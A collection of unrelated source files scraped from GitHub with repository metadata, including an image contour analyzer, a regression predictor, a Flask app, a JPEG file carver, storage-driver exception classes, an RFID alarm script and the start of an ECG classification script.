median_pix = np.median(gray_img_safran)
lower = int(max(0, 0.5*median_pix))
upper = int(min(255, 1.3*median_pix))
edged = cv2.Canny(gray_img_safran, lower, upper)
        # Contour detection
        # The hierarchy variable holds information about the relationship between contours (whether a contour lies inside another)
contours_list_safran, hierarchy = cv2.findContours(edged, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
if contours_list_safran:
contourSafran = None
for c in contours_list_safran:
                # If a contour lies within 15 pixels of the point (point on the leading edge of the rudder)
if abs(cv2.pointPolygonTest(c, (self.x1RefPoint + 1, self.y1RefPoint + 3), True)) < 15:
contourSafran = c
tOffSetSafran = (self.x1, self.y1)
points = []
                    # Check whether the points roughly satisfy the rudder line equation
                    # Equation representing the straight line along the rudder
for point in c:
x = point[0][0]
y = point[0][1]
                        # Result of the equation
resultEquation = m * x - y + p
if resultEquation > -15 and resultEquation < 15:
points.append((x, y))
if len(points) >= 2:
                    # firstPointSafran = min(points, key=lambda x:x[1]) # smallest y value
firstPointSafran = (self.x1RefPoint, self.y1RefPoint)
                    # largest y value
secondPointSafran = max(points, key=lambda x: x[1])
                    # Add the offset so the points line up with the original image
firstPointSafranOffSet = tuple(map(lambda x, y: x + y, firstPointSafran, tOffSetSafran))
secondPointSafranOffSet = tuple(map(lambda x, y: x + y, secondPointSafran, tOffSetSafran))
hauteurSafran = secondPointSafran[1] - firstPointSafran[1]
                    # Offset the contour coordinates so they line up with the original image (frame)
contourSafranOffset = contourSafran + (self.x1, self.y1)
return Contour(hauteurSafran, contourSafranOffset, firstPointSafranOffSet, secondPointSafranOffSet, qualityIndex)
return Contour(None, None, None, None, qualityIndex)
|
Torystan/analyse-images
|
analyzers/analyseSafran.py
|
analyseSafran.py
|
py
| 4,231
|
python
|
fr
|
code
| 0
|
github-code
|
6
|
38466019670
|
__author__ = 'christiaanleysen'
import features.featureMaker as fm
from sklearn.metrics import mean_absolute_error
import matplotlib.pyplot as plt
import numpy as np
from sklearn.linear_model import LinearRegression
from sklearn import preprocessing
'''
This file is used to calculate the linear regression
'''
def predictConsumption(trainSetX, trainSetY, testSetX, testSetY,tune_params=True,scaled=False):
"""
predicts the consumption
Parameters:
-----------
trainSetX: training feature set
trainSetY: training value set
testSetX: test feature set
testSetY: test value set
Returns:
--------
a prediction of the consumption
"""
if scaled:
trainSetX = np.asarray([preprocessing.scale(element)for element in trainSetX])
#trainSetY =preprocessing.scale(trainSetY,axis=0)
testSetX = np.asarray([preprocessing.scale(element )for element in testSetX])
#testSetY =preprocessing.scale(testSetY,axis=0)
OLS = LinearRegression()
    OLS.fit(trainSetX,trainSetY)  # fit an ordinary least squares model to the training data
predictedSetY = OLS.predict(testSetX)
MAE = mean_absolute_error(testSetY,predictedSetY)
if np.mean(np.mean(testSetY)) == 0:
MRE = 50
else:
MRE = (MAE/(np.mean(testSetY)))*100
return predictedSetY,testSetY,MAE,MRE
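# Minimal usage sketch with synthetic data (illustrative values only, not the thesis data set).
if __name__ == '__main__':
    rng = np.random.RandomState(0)
    train_X = rng.rand(20, 3)
    train_Y = train_X.dot([1.0, 2.0, 3.0]) + 0.1 * rng.randn(20)
    test_X = rng.rand(5, 3)
    test_Y = test_X.dot([1.0, 2.0, 3.0])
    predicted, actual, mae, mre = predictConsumption(train_X, train_Y, test_X, test_Y)
    print("MAE:", mae, "MRE (%):", mre)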
|
chrike-platinum/Thesis-Gaussian-process-regression-clustering-and-prediction-of-energy-consumption
|
Methods/LinRegPrediction.py
|
LinRegPrediction.py
|
py
| 1,353
|
python
|
en
|
code
| 1
|
github-code
|
6
|
23135628898
|
# Make Table 4: Snowdrift Type Census Zonal Statistics
import pandas as pd
df = pd.read_csv('drift_zonal_statistics_mean_over_time.csv', index_col=False)
del df['Median Drift Depth [m]']
df.replace('watertrack', 'water track (f)', inplace=True)
df.replace('polygon', 'ice wedge (f)', inplace=True)
df.replace('stream', 'stream (nf)', inplace=True)
df.replace('lake', 'lake (nf)', inplace=True)
df.replace('outcrop', 'outcrop (nf)', inplace=True)
df['Drift Area [m^2]'] = df['Drift Area [m^2]'].astype(int)
df['Mean Drift Volume [m^3]'] = df['Mean Drift Volume [m^3]'].astype(int)
df.columns = ['Class','Swath','Drift Area (m<sup>2</sup>)', 'Mean Drift Depth (m)', 'Drift Volume (m<sup>3</sup>)',
'Std. Depth (m)', 'CV Depth', 'NDV (m)']
df2 = df.groupby(['Swath','Class']).mean().reset_index()
df2['Drift Area (m<sup>2</sup>)'] = df2['Drift Area (m<sup>2</sup>)'].astype(int)
df2['Drift Volume (m<sup>3</sup>)'] = df2['Drift Volume (m<sup>3</sup>)'].astype(int)
df2.set_index('Swath', inplace=True)
df2 = df2.sort_values('Class')
df2 = df2.round(2)
hv_outcrop = pd.Series(['outcrop (nf)', 'N/A', 'N/A', 'N/A', 'N/A', 'N/A', 'N/A',], name='HV', index=df2.columns)
df2 = df2.append(hv_outcrop)
df2 = df2.sort_values('Class')
print(df2.to_markdown())
|
charparr/arctic-snowdrifts
|
snowdrift_type_census/results/make_table_4.py
|
make_table_4.py
|
py
| 1,271
|
python
|
en
|
code
| 0
|
github-code
|
6
|
27267969236
|
from flask import Flask, render_template
from shp_display import *
app = Flask(__name__)
def script():
return ['hades2']
def get_table(db):
db = db
script = "<table>"
# Header Generator
code = "<tr>"
for s in db:
if str(s) != "MULTIPOLYGON" and str(s) != 'geometry':
code = code + "<th>" + str(s) + "</th>"
script = script + code
# Data Generator
for i in range(len(db.index)):
code = "<tr>"
for item in list(db.loc[i]):
if not str(item).startswith("MULTIPOLYGON") and not str(item).startswith("POLYGON "):
code = code + "<td>" + str(item) + "</td>"
code = code + "</tr>"
script = script + code
script = script + "</table>"
return script
@app.route('/')
def index():
    value = script()
    some = get_file()  # load the shapefile data and map image, as in up_pop below
    return render_template('index.html',
entry1=value[0],
path_to_image=some[0],
lis=some[1].shape,
table_n=get_table(some[1])
)
@app.route('/up_pop')
def up_pop():
some = get_file()
return render_template('up_population.html',
table_n=get_table(some[1]),
path_to_image=some[0])
if __name__ == "__main__":
app.run(debug=True, host='10.68.69.29')
|
nitish8090/Watershed_Modules_Py3
|
flask_app/app.py
|
app.py
|
py
| 1,373
|
python
|
en
|
code
| 0
|
github-code
|
6
|
37964221731
|
import sys
import os
import random
from PIL import Image
'''
Simple image carver. Right now it will assemble any and all JPEGS found including partial fragmented files. It does not find the rest of the file.
You must have pillow installed. You can do that by `pip install pillow`.
YOU MUST HAVE PYTHON 3 NOT 2! THE Pillow version used is the python version 3 and I can't guarantee any of this works on python 2.
'''
def main():
if len(sys.argv) < 2:
print("Invalid input, you must specify a file as the first argument.")
exit(0)
readFile(sys.argv[1])
# Reads file and creates the list of SOI AND EOI markers
def readFile(filename):
startMarkerArr = []
endMarkerArr = []
sosArr = []
counter = 0
fileSize = os.stat(filename).st_size
file = open(filename, 'rb')
fileBuffer = bytearray(file.read())
while counter < fileSize:
byte1 = bytes([fileBuffer[counter]])
byte2 = bytes([fileBuffer[counter+1]])
if findStart(byte1, byte2):
startMarkerArr.append(counter)
if findEnd(byte1, byte2):
endMarkerArr.append(counter)
counter += 2
print("Found markers")
pairs = findPairs(startMarkerArr, endMarkerArr, sosArr)
validCount = buildFile(pairs)
#Finds SOI
def findStart(byte1, byte2):
if byte1 == b'\xFF' and byte2 == b'\xD8':
return True
return False
#Finds EOI
def findEnd(byte1, byte2):
if byte1 == b'\xFF' and byte2 == b'\xD9':
return True
return False
#Creates the pairs of SOI and EOI markers
def findPairs(startMarkerArr, endMarkerArr, sosArr):
markerPairs = []
for startI in range(0, len(startMarkerArr)):
for endI in range(0, len(endMarkerArr)):
if startMarkerArr[startI] < endMarkerArr[endI] + 2:
markerPairs.append((startMarkerArr[startI], endMarkerArr[endI]))
print("Found pairs list size is " + str(len(markerPairs)))
return markerPairs
#Tests all pairs and tests/ deletes invalid images using Pillow/ PIL
# Also tests to see if the discovered file is the smallest of the ones generated from the same SOI
def buildFile(markerPairs):
file = open(sys.argv[1], 'rb')
byteBuffer = file.read()
counter = 0
smallestHashMap = {}
while counter < len(markerPairs):
jpegBytes = bytearray()
start = markerPairs[counter][1]
jpegBytes.extend(byteBuffer[markerPairs[counter][0]:markerPairs[counter][1]+2])
name = str(random.random())
jpegFile = open(name + ".jpg", 'wb+')
jpegFile.write(jpegBytes)
try:
Image.open(name + ".jpg")
except IOError:
os.remove(name + ".jpg")
print("Invalid image removed")
else:
if smallestHashMap.get(markerPairs[counter][0]) != None:
print(len(jpegBytes), smallestHashMap[markerPairs[counter][0]][0])
if counter != 0 and smallestHashMap.get(markerPairs[counter][0]) != None and len(jpegBytes) < smallestHashMap[markerPairs[counter][0]][0]:
print("Smaller image found, duplicate removed!")
os.remove(smallestHashMap[markerPairs[counter][0]][1])
smallestHashMap[markerPairs[counter][0]] = (len(jpegBytes), name + ".jpg")
if smallestHashMap.get(markerPairs[counter][0]) != None and len(jpegBytes) > smallestHashMap[markerPairs[counter][0]][0]:
os.remove(name + ".jpg")
print("Original is the smallest duplicate removed")
if smallestHashMap.get(markerPairs[counter][0]) == None:
smallestHashMap[markerPairs[counter][0]] = (len(jpegBytes), name + ".jpg")
print("One valid image has been added or replaced")
counter += 1
# Standard Python entry point: run main() when the script is executed directly
if __name__ == '__main__':
main()
|
steviekong/Jpeg_carver
|
carver.py
|
carver.py
|
py
| 3,434
|
python
|
en
|
code
| 1
|
github-code
|
6
|
26247964346
|
import six
import webob.exc
from oslo_log import log
from delfin.i18n import _
LOG = log.getLogger(__name__)
class ConvertedException(webob.exc.WSGIHTTPException):
def __init__(self, exception):
self.code = exception.code
self.title = ''
self.explanation = exception.msg
self.error_code = exception.error_code
self.error_args = exception.error_args
super(ConvertedException, self).__init__()
class DelfinException(Exception):
"""Base Delfin Exception
To correctly use this class, inherit from it and define
a 'msg_fmt' property. That msg_fmt will get printf'd
with the tuple arguments provided to the constructor.
"""
msg_fmt = _("An unknown exception occurred.")
code = 500
def __init__(self, *args, **kwargs):
self.error_args = args
message = kwargs.get('message')
try:
if not message:
message = self.msg_fmt.format(*args)
else:
message = six.text_type(message)
except Exception:
LOG.error("Failed to format message: {0}".format(args))
message = self.msg_fmt
self.msg = message
super(DelfinException, self).__init__(message)
@property
def error_code(self):
return self.__class__.__name__
class NotAuthorized(DelfinException):
msg_fmt = _("Not authorized.")
code = 403
class Invalid(DelfinException):
msg_fmt = _("Unacceptable parameters.")
code = 400
class BadRequest(Invalid):
msg_fmt = _('The server could not comply with the request since\r\n'
'it is either malformed or otherwise incorrect.\r\n')
code = 400
class MalformedRequestBody(Invalid):
msg_fmt = _("Malformed request body: {0}.")
class MalformedRequestUrl(Invalid):
msg_fmt = _("Malformed request url.")
class InvalidCredential(Invalid):
msg_fmt = _("The credentials are invalid.")
class InvalidResults(Invalid):
msg_fmt = _("The results are invalid. {0}")
class InvalidInput(Invalid):
msg_fmt = _("Invalid input received. {0}")
class InvalidName(Invalid):
msg_fmt = _("An invalid 'name' value was provided. {0}")
class InvalidContentType(Invalid):
msg_fmt = _("Invalid content type: {0}.")
class StorageSerialNumberMismatch(Invalid):
msg_fmt = _("Storage serial number mismatch. {0}")
class StorageAlreadyExists(Invalid):
msg_fmt = _("Storage already exists.")
class InvalidSNMPConfig(Invalid):
msg_fmt = _("Invalid SNMP configuration: {0}")
class NotFound(DelfinException):
msg_fmt = _("Resource could not be found.")
code = 404
class NoSuchAction(NotFound):
msg_fmt = _("There is no such action: {0}")
class AccessInfoNotFound(NotFound):
msg_fmt = _("Access information for storage {0} could not be found.")
class AlertSourceNotFound(NotFound):
msg_fmt = _("Alert source for storage {0} could not be found.")
class AlertSourceNotFoundWithHost(NotFound):
msg_fmt = _("Alert source could not be found with host {0}.")
class SNMPConnectionFailed(BadRequest):
msg_fmt = _("Connection to SNMP server failed: {0}")
class StorageNotFound(NotFound):
msg_fmt = _("Storage {0} could not be found.")
class StorageBackendNotFound(NotFound):
msg_fmt = _("Storage backend could not be found.")
class StoragePoolNotFound(NotFound):
msg_fmt = _("Storage pool {0} could not be found.")
class VolumeNotFound(NotFound):
msg_fmt = _("Volume {0} could not be found.")
class StorageHostInitiatorNotFound(NotFound):
msg_fmt = _("Storage host initiator {0} could not be found.")
class StorageHostNotFound(NotFound):
msg_fmt = _("Storage host {0} could not be found.")
class StorageHostGroupNotFound(NotFound):
msg_fmt = _("Storage host group {0} could not be found.")
class PortGroupNotFound(NotFound):
msg_fmt = _("Port group {0} could not be found.")
class VolumeGroupNotFound(NotFound):
msg_fmt = _("Volume group {0} could not be found.")
class MaskingViewNotFound(NotFound):
msg_fmt = _("Masking View {0} could not be found.")
class StorageHostGrpHostRelNotFound(NotFound):
msg_fmt = _("Storage Host Group Host Relation {0} could not be found.")
class PortGrpPortRelNotFound(NotFound):
msg_fmt = _("Port Group Port Relation {0} could not be found.")
class VolGrpVolRelationNotFound(NotFound):
msg_fmt = _("Volume Group Volume Relation {0} could not be found.")
class ControllerNotFound(NotFound):
msg_fmt = _("Controller {0} could not be found.")
class ControllerListNotFound(NotFound):
msg_fmt = _("Controller List for {0} could not be found.")
class PortNotFound(NotFound):
msg_fmt = _("Port {0} could not be found.")
class PortListNotFound(NotFound):
msg_fmt = _("Port List for {0} could not be found.")
class DiskNotFound(NotFound):
msg_fmt = _("Disk {0} could not be found.")
class FilesystemNotFound(NotFound):
msg_fmt = _("Filesystem {0} could not be found.")
class QtreeNotFound(NotFound):
msg_fmt = _("Qtree {0} could not be found.")
class QuotaNotFound(NotFound):
msg_fmt = _("Quota {0} could not be found.")
class ShareNotFound(NotFound):
msg_fmt = _("Share {0} could not be found.")
class StorageDriverNotFound(NotFound):
    msg_fmt = _("Storage driver '{0}' could not be found.")
class TaskNotFound(NotFound):
msg_fmt = _("Task {0} could not be found.")
class FailedTaskNotFound(NotFound):
msg_fmt = _("Failed task {0} could not be found.")
class ConfigNotFound(NotFound):
msg_fmt = _("Could not find config at {0}.")
class PasteAppNotFound(NotFound):
msg_fmt = _("Could not load paste app '{0}' from {1}.")
class StorageBackendException(DelfinException):
msg_fmt = _("Exception from Storage Backend: {0}.")
class SSHException(DelfinException):
msg_fmt = _("Exception in SSH protocol negotiation or logic. {0}")
class SSHInjectionThreat(DelfinException):
msg_fmt = _("SSH command injection detected: {0}.")
# Tooz locking
class LockCreationFailed(DelfinException):
msg_fmt = _('Unable to create lock. Coordination backend not started.')
class LockAcquisitionFailed(DelfinException):
msg_fmt = _('Lock acquisition failed.')
class DuplicateExtension(DelfinException):
msg_fmt = _('Found duplicate extension: {0}.')
class ImproperIPVersion(DelfinException):
msg_fmt = _("Provided improper IP version {0}.")
class ConnectTimeout(DelfinException):
msg_fmt = _("Connect timeout.")
code = 500
class InvalidUsernameOrPassword(DelfinException):
msg_fmt = _("Invalid username or password.")
code = 400
class BadResponse(Invalid):
msg_fmt = _('Bad response from server')
code = 500
class InvalidPrivateKey(DelfinException):
msg_fmt = _("not a valid RSA private key.")
code = 400
class SSHConnectTimeout(DelfinException):
msg_fmt = _("SSH connect timeout.")
code = 500
class SSHNotFoundKnownHosts(NotFound):
msg_fmt = _("{0} not found in known_hosts.")
code = 400
class StorageClearAlertFailed(DelfinException):
msg_fmt = _("Failed to clear alert. Reason: {0}.")
class StorageListAlertFailed(DelfinException):
msg_fmt = _("Failed to list alerts. Reason: {0}.")
class HTTPConnectionTimeout(DelfinException):
msg_fmt = _("HTTP connection timeout: {0}.")
class InvalidCAPath(DelfinException):
msg_fmt = _("Invalid CA path: {0}.")
class StoragePerformanceCollectionFailed(DelfinException):
msg_fmt = _("Failed to collect performance metrics. Reason: {0}.")
class SSLCertificateFailed(Invalid):
msg_fmt = _("SSL Certificate Failed.")
code = 400
class SSLHandshakeFailed(Invalid):
msg_fmt = _("SSL handshake failure.")
class StorageIsSyncing(Invalid):
msg_fmt = _("Storage {0} is syncing now, please try again later.")
class InvalidIpOrPort(DelfinException):
msg_fmt = _("Invalid ip or port.")
code = 400
class InvalidStorageCapability(Invalid):
msg_fmt = _("Invalid capability response: {0}")
code = 500
class StorageCapabilityNotSupported(Invalid):
msg_fmt = _("Capability feature not supported by storage")
code = 501
class EmptyResourceMetrics(DelfinException):
msg_fmt = _("Empty resource metric in capabilities")
code = 501
class TelemetryTaskExecError(DelfinException):
msg_fmt = _("Failure in telemetry task execution")
class ComponentNotFound(NotFound):
msg_fmt = _("Component {0} could not be found.")
class IncompleteTrapInformation(DelfinException):
msg_fmt = _("Incomplete trap information."
"Storage {0} alert information needs to be synchronized.")
class StorageMaxUserCountException(DelfinException):
msg_fmt = _(
"Exception from storage of users has reached the upper limit: {0}.")
|
sodafoundation/delfin
|
delfin/exception.py
|
exception.py
|
py
| 8,827
|
python
|
en
|
code
| 201
|
github-code
|
6
|
16543442339
|
# RE_DATA names
DATA_BLOCK = "Data"
ACTION = "Action"
STAGE = "Stage"
STATIONFROM = "StationFrom"
STATIONFROMCODE = "StationFromCode"
STATIONTO = "StationTo"
STATIONTOCODE = "StationToCode"
DEPARTDATE = "DepDate"
DEPARTTIME = "DepTime"
BADDATE = "BadDate"
BADTIME = "BadTime"
ARRTIME = "ArrTime"
STATIONAT = "StationAt"
STATIONATTIME = "StationAtTime"
SINGLERETURN = "SingleReturn"
RETURNDATE = "ReturnDate"
RETURNTIME = "ReturnTime"
RESPONSE_HEAD = "Response"
RESPONSE_CODE = "Code"
RESPONSE_DATA = "ResponseData"
CONFIRMED = "Confirmed"
QUESTION = "Question"
ACTUALDEPART = "ActualDepart"
QUESTIONSEARCHING = "QSEARCHING"
QUESTIONTREE = "QUESTIONTREE"
STATUS_EXIT = 999
STATUS_INVALID = "Status Invalid"
FORMAT_DATE = '%d/%m/%Y'
FORMAT_TIME = '%H:%M'
FORMAT_DATETIME = FORMAT_DATE + ' ' + FORMAT_TIME
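# Usage sketch (assumption: these format strings are intended for datetime.strptime/strftime):
if __name__ == '__main__':
    from datetime import datetime
    dep = datetime.strptime('25/12/2023 14:30', FORMAT_DATETIME)
    print(dep.strftime(FORMAT_DATE))  # 25/12/2023
    print(dep.strftime(FORMAT_TIME))  # 14:30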
|
Grimmii/TrainChatBot
|
src/ai_chatbot/scripts/REDataHeader.py
|
REDataHeader.py
|
py
| 806
|
python
|
en
|
code
| 0
|
github-code
|
6
|
1601092211
|
__author__ = "Meet Dave"
__version__ = "1.0"
__maintainer__ = "Meet Dave"
__email__ = "meetkirankum@umass.edu"
# Load libraries
import matplotlib.pyplot as plt
import torch
import cv2
import numpy as np
from torchvision import models
from torchvision import transforms
from make_video import make_video
# Load pretrained model
deeplapv3_101 = models.segmentation.deeplabv3_resnet101(pretrained=True).eval()
# Load background image
background_path = "../images/books-seats.png"
background = cv2.imread(background_path)
background = cv2.cvtColor(background, cv2.COLOR_BGR2RGB)
video_path = "../images/test1.avi"
# Webcam stream
cap = cv2.VideoCapture(0)
ret, img = cap.read()
height = img.shape[0]
width = img.shape[1]
video_download = make_video(video_path,width,height)
background = cv2.resize(background, (width,height))
background = background.astype(float)
# Preprocess class
preprocess = transforms.Compose([
transforms.ToPILImage(),
transforms.Resize((256,256)),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
])
while(True):
ret, img = cap.read()
if ret:
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
# Preprocess image
input_img = preprocess(img)
# Creating a batch dimension
input_batch = input_img.unsqueeze(0)
# Inference
output = deeplapv3_101(input_batch)['out'][0]
final_output = output.argmax(dim=0)
# Just keep person class and make everything else background
person_output = torch.zeros_like(final_output)
person_output[final_output == 15] = 1
img_resize = cv2.resize(img,(256,256))
# Get person segmentation
foreground = img_resize * person_output.numpy()[:,:,None]
foreground = foreground.astype(float)
foreground_orig_size = cv2.resize(foreground,(width,height))
# Create alpha mask for blending
th, alpha = cv2.threshold(foreground_orig_size,0,255, cv2.THRESH_BINARY)
# Smooth the edges for smooth blending
alpha = (cv2.GaussianBlur(alpha, (7,7),0))/255
final = foreground_orig_size * alpha + background * (1 - alpha)
final = final[...,::-1]
final = (final).astype(np.uint8)
cv2.imshow('frame',final)
video_download.write(final)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
|
meetdave06/random-cv-tasks
|
test1/test1.py
|
test1.py
|
py
| 2,455
|
python
|
en
|
code
| 0
|
github-code
|
6
|
73727669948
|
import torch
def get_device(model=None):
"""Returns two-tuple containing a PyTorch device (CPU or GPU(s)), and number of available GPUs.
Returns a two-tuple containing a PyTorch device (CPU or GPU(s)) and number of available CUDA
devices. If `model` is not None, and a CUDA device is available, the model is placed on the
CUDA device with `model.to(device)`. If multiple GPUs are available, the model is parallized
with `torch.nn.DataParallel(model)`.
Args:
(Torch.nn.Module) PyTorch model, if CUDA device is available this function will place the
model on the CUDA device with `model.to(device)`. If multiple CUDA devices are available,
the model is parallized with `torch.nn.DataParallel(model)`.
Returns:
A two-tuple containing a PyTorch device (CPU or GPU(s)), and number of available GPUs.
"""
n_gpu = 0
# use a GPU if available
if torch.cuda.is_available():
device = torch.device("cuda")
n_gpu = torch.cuda.device_count()
# if model is provided, we place it on the GPU and parallize it (if possible)
if model:
model.to(device)
if n_gpu > 1:
model = torch.nn.DataParallel(model)
model_names = ', '.join([torch.cuda.get_device_name(i) for i in range(n_gpu)])
print('Using CUDA device(s) with name(s): {}.'.format(model_names))
else:
device = torch.device("cpu")
print('No GPU available. Using CPU.')
return device, n_gpu
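# Minimal usage sketch (the `model` and `batch` objects below are assumptions, not defined in this module):
# device, n_gpu = get_device(model)
# batch = batch.to(device)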
def preprocess_query(query):
"""Preprocesses `query` to look more like natural language.
Preprocess `query` to look more like natural language by punctuating it with a question mark and
rearranging it into a subject-verb-object (SVO) topology.
Args:
query (str): Query from Wiki- or Medhop.
Returns:
`query`, punctuated by a question mark and re-arranged into an SVO topology.
"""
return ' '.join(query.split(' ')[1:] + query.split(' ')[0].split('_')).replace('?', '') + '?'
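# Worked example (hypothetical WikiHop-style query, not taken from the dataset):
# preprocess_query('country_of_citizenship barack_obama')  ->  'barack_obama country of citizenship?'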
|
bowang-lab/Transformer-GCN-QA
|
src/utils/model_utils.py
|
model_utils.py
|
py
| 2,040
|
python
|
en
|
code
| 15
|
github-code
|
6
|
24199424367
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 25 15:22:37 2019
@author: Administrator
"""
# Definition for singly-linked list.
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
import test_module
from queue import PriorityQueue
class Node:
def __init__(self, priority, node):
self.priority = priority
self.node = node
def __lt__(self, other):
return self.priority < other.priority
class Solution:
def mergeKLists(self, lists):
pq = PriorityQueue()
for _list in lists:
if _list:
pq.put(Node(_list.val, _list))
dummy_head = ListNode(0)
cur = dummy_head
while pq.qsize() != 0:
min_node = pq.get()
cur.next = min_node.node
cur = cur.next
if min_node.node.next:
pq.put(Node(min_node.node.next.val, min_node.node.next))
return dummy_head.next
if __name__ == '__main__':
arrs = [[1,4,5],[1,3,4],[2,6]]
heads = []
for arr in arrs:
heads.append(test_module.create_list_node(arr, len(arr)))
for head in heads:
test_module.print_linked_list(head)
res = Solution().mergeKLists(heads)
test_module.print_linked_list(res)
|
AiZhanghan/Leetcode
|
code/23. Merge k Sorted Lists.py
|
23. Merge k Sorted Lists.py
|
py
| 1,325
|
python
|
en
|
code
| 0
|
github-code
|
6
|
18821603273
|
import os
def rename_files():
# 1 get file names from a folder
# r stands for raw path
file_list = os.listdir(r"D:\workspace\Udacity\Course 1\Lesson 1\Prank")
print(file_list)
os.chdir(r"D:\workspace\Udacity\Course 1\Lesson 1\Prank")
# 2 for each file, rename file
for file_name in file_list:
os.rename("athensssss.jpg", "austin.jpg")
print("New file name: " + file_name)
rename_files()
|
joshuar500/full-stack-nano
|
Course 1/Lesson 1/rename_files.py
|
rename_files.py
|
py
| 438
|
python
|
en
|
code
| 0
|
github-code
|
6
|
73675801466
|
import os, sys
proj_path = "/home/webuser/webapps/tigaserver/"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "tigaserver_project.settings")
sys.path.append(proj_path)
os.chdir(proj_path + "util_scripts/")
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
from django.db.models import Count
from tigaserver_app.models import EuropeCountry, Report, ExpertReportAnnotation, Categories
current_progress = Report.objects.exclude(creation_time__year=2014).exclude(note__icontains="#345").exclude(hide=True).exclude(photos=None).filter(type='adult').annotate(n_annotations=Count('expert_report_annotations')).filter(n_annotations__lt=3).exclude(n_annotations=0).order_by('-server_upload_time')
reports_filtered = filter(lambda x: not x.deleted and x.latest_version, current_progress)
for c in current_progress:
country = 'None'
if c.country is not None:
country = c.country.name_engl
print("Report in progress {0} - country {1} - date {2}".format(c.version_UUID, country, c.server_upload_time ))
assigned_to = ExpertReportAnnotation.objects.filter(report=c)
for a in assigned_to:
print("\t - assigned to {0} from country , regional manager , country has regional manager ".format( a.user.username ))
|
Mosquito-Alert/mosquito_alert
|
util_scripts/check_in_progress_reports.py
|
check_in_progress_reports.py
|
py
| 1,276
|
python
|
en
|
code
| 6
|
github-code
|
6
|
39380382951
|
import datetime
import jpholiday
from django import template
register = template.Library() # Django's template tag library
# Register these as custom filters
@register.filter
def get_dict_value(dictionary, key):
return dictionary.get(key)
@register.filter
def append_string(dest, src):
return dest + src
@register.filter
def get_day_class(date):
day_class = ''
# date is a string in year/month/day format
#d = datetime.strptime(date,'%Y/%m/%d')
# Workaround because is_holiday does not behave correctly when strptime is used
# (the cause seems to be that the value becomes datetime.date(2020,7,23,0,0)?)
sp = date.split('/')
day = datetime.date(int(sp[0]), int(sp[1]), int(sp[2]))
if day.weekday() == 5:
# Saturday
day_class = 'text-primary'
elif day.weekday() == 6 or jpholiday.is_holiday(day):
# Sunday or public holiday
day_class = 'text-danger'
return day_class
@register.filter
def get_monthly_max(monthly_list):
max_count = 0
for date, count in monthly_list:
max_count = max(max_count, count)
return max_count
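# Usage sketch in a Django template (variable names are assumptions):
# {% load pole_tags %}
# {{ some_dict|get_dict_value:some_key }}   {{ "2020/07/23"|get_day_class }}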
|
manakamu/docker
|
django/Docker-Django/django_project/pole/templatetags/pole_tags.py
|
pole_tags.py
|
py
| 1,141
|
python
|
ja
|
code
| 0
|
github-code
|
6
|
39463837440
|
# Standard library imports
import serial
import time
import sys
import zerorpc
import datetime
# Application library imports
from MySQLhandler import *
import Utility
SCRIPT_NAME = "RFIDhandler"
TIME_BEFORE_ACTIVATION = 60 * 5
print("Initialize serial connection with Arduino")
try:
s = serial.Serial('/dev/ttyACM0', 9600)
except:
error_msg = "Unable to connect to the Arduino"
print(error_msg)
Utility.launch_fatal_process_alert(SCRIPT_NAME, error_msg)
time.sleep(50000) # Wait a moment for a possible fix
sys.exit() # Close the process and hope for a restart (-> supervisor)
# Each variable stores an object capable of inserting, updating and deleting
# in the given table
timeshot = 0
while True:
line = s.readline() # Get the line sent by the Arduino
try:
db_devices = MySQL('devices')
db_alarms = MySQL('alarms')
db_users = MySQL('users')
except:
error_msg = "Unable to connect to the database"
print(error_msg)
Utility.launch_fatal_process_alert(SCRIPT_NAME, error_msg)
time.sleep(50000)
sys.exit()
user = db_users.get('RFID', line.split('\r')[0])
# [user] represents the owner's row of the RFID tag passed
# if it exists
if user:
Utility.switch_led_info(0)
Utility.sound(0)
c = zerorpc.Client()
c.connect("tcp://127.0.0.1:4242")
c.RFID()
alarms = db_alarms.all()
state = bool(alarms[0]['state'])
is_one_alarm_up = False
for alarm in alarms:
is_one_alarm_up = is_one_alarm_up or bool(alarm['state'])
if is_one_alarm_up and not state:
for alarm in alarms:
db_alarms.modify(alarm['id'], 'state', state)
elif not state:
print("[{}]: Waiting {} sec before activation".format(datetime.datetime.now().strftime("%d/%b/%Y %H:%M:%S"), TIME_BEFORE_ACTIVATION))
time.sleep(TIME_BEFORE_ACTIVATION)
for alarm in alarms:
db_alarms.modify(alarm['id'], 'state', not state)
elif state:
print("[{}]: Deactivating".format(datetime.datetime.now().strftime("%d/%b/%Y %H:%M:%S")))
for alarm in alarms:
db_alarms.modify(alarm['id'], 'state', not state)
else:
print("[{}]: Unauthorized tag".format(datetime.datetime.now().strftime("%d/%b/%Y %H:%M:%S")))
c = zerorpc.Client()
c.connect("tcp://127.0.0.1:4242")
c.RFIDError()
|
jeremyalbrecht/Alarm-RPI
|
RFIDhandler.py
|
RFIDhandler.py
|
py
| 2,490
|
python
|
en
|
code
| 0
|
github-code
|
6
|
43367818416
|
# Permutation feature importance (PFI) for heartbeat classification using a multilayer perceptron (MLP)
#
#
# - Code 'PFI.py'
# - Master's thesis.
# - Néstor Bolaños Bolaños. (nestorbolanos@correo.ugr.es)
import warnings
warnings.filterwarnings("ignore")
import numpy as np
import pickle
import glob
import matplotlib.pyplot as plt
import pandas as pd
from scipy import *
import os
import seaborn as sns
import tensorflow as tf
from tensorflow.keras.utils import to_categorical
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense
from sklearn import *
from sklearn.metrics import *
from sklearn.model_selection import StratifiedKFold
sns.set()
# Load the data and one-hot encode the class of each heartbeat
# Load the training and test data:
tamaño = 277
valores_train = np.empty(shape=[0, tamaño])
valores_test = np.empty(shape=[0, tamaño])
latidos_entrenamiento = glob.glob('train_beats.csv')
latidos_test = glob.glob('test_beats.csv')
for j in latidos_entrenamiento:
filas = np.loadtxt(j, delimiter=',')
valores_train = np.append(valores_train, filas, axis=0)
for j in latidos_test:
filas = np.loadtxt(j, delimiter=',')
valores_test = np.append(valores_test, filas, axis=0)
print(valores_train.shape)
print(valores_test.shape)
# Split into training and test data, and apply one-hot encoding to Y:
X_train = valores_train[:,:-2]
X_test = valores_test[:,:-2]
y_train = valores_train[:,-2]
y_test = valores_test[:,-2]
